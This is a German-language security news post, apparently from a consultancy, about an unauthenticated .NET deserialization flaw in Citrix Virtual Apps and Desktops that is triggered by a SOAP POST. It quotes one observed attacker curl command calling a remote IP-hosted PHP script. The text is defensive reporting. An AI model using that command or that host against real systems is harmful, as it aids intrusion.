Anfang November 2024 hat Watchtowr Labs Details zu einer noch nicht gepatchten Sicherheitslücke in Citrix’ Remote-Zugriffs-Lösung veröffentlicht. Diese Schwachstelle betrifft speziell Citrix Virtual Apps and Desktops, eine Lösung, die häufig für sicheren Remote-Zugang zu Desktop-Anwendungen verwendet wird – etwa in Call-Center-Umgebungen.
Die Schwachstelle betrifft das Deserialisierungsproblem in einer .NET-Funktion, die für die Sitzungsaufzeichnung verwendet wird. Diese Verwundbarkeit ermöglicht es einem Angreifer, den Exploit ohne Authentifizierung auszulösen. Der Angriff könnte nicht nur auf den Desktop selbst abzielen, sondern aufgrund der Privilegieneskalation den gesamten Server und alle darauf laufenden Sitzungen kompromittieren.
Das Exploit wird über einen SOAP-POST-Request initiiert und enthält eine bösartige Payload, das eine curl-Anfrage zu einer entfernten URL absendet:
curl http://91.212.166.60/script_xen80-mix.phpDie angeforderte URL war momentan nicht zugänglich, was darauf hindeutet, dass der Angreifer möglicherweise IP-Adressen filtert oder für Follow-up-Angriffe speichert. Die Anfrage scheint aus einer IP-Adresse in Johannesburg, Südafrika zu stammen.
Der Exploit erfordert keine vorherige Authentifizierung, was ihn besonders gefährlich macht. Unternehmen sollten daher auch ihre Firewalls und Intrusion Detection Systeme auf verdächtige Anfragen überprüfen, die mit der beschriebenen SOAP-Post-Methode zusammenhängen.
Ähnliche Beiträge:
Professionelle Hilfe erwünscht?
Sentiguard ist spezialisiert auf Notfallhilfe nach Cyberattacken, IT Sicherheitsbeauftragte und IT Sicherheitskonzepte nach BSI Standard. Haben Sie Fragen und wünschen Sie unverbindliche Beratung, dann melden Sie sich gerne bei uns: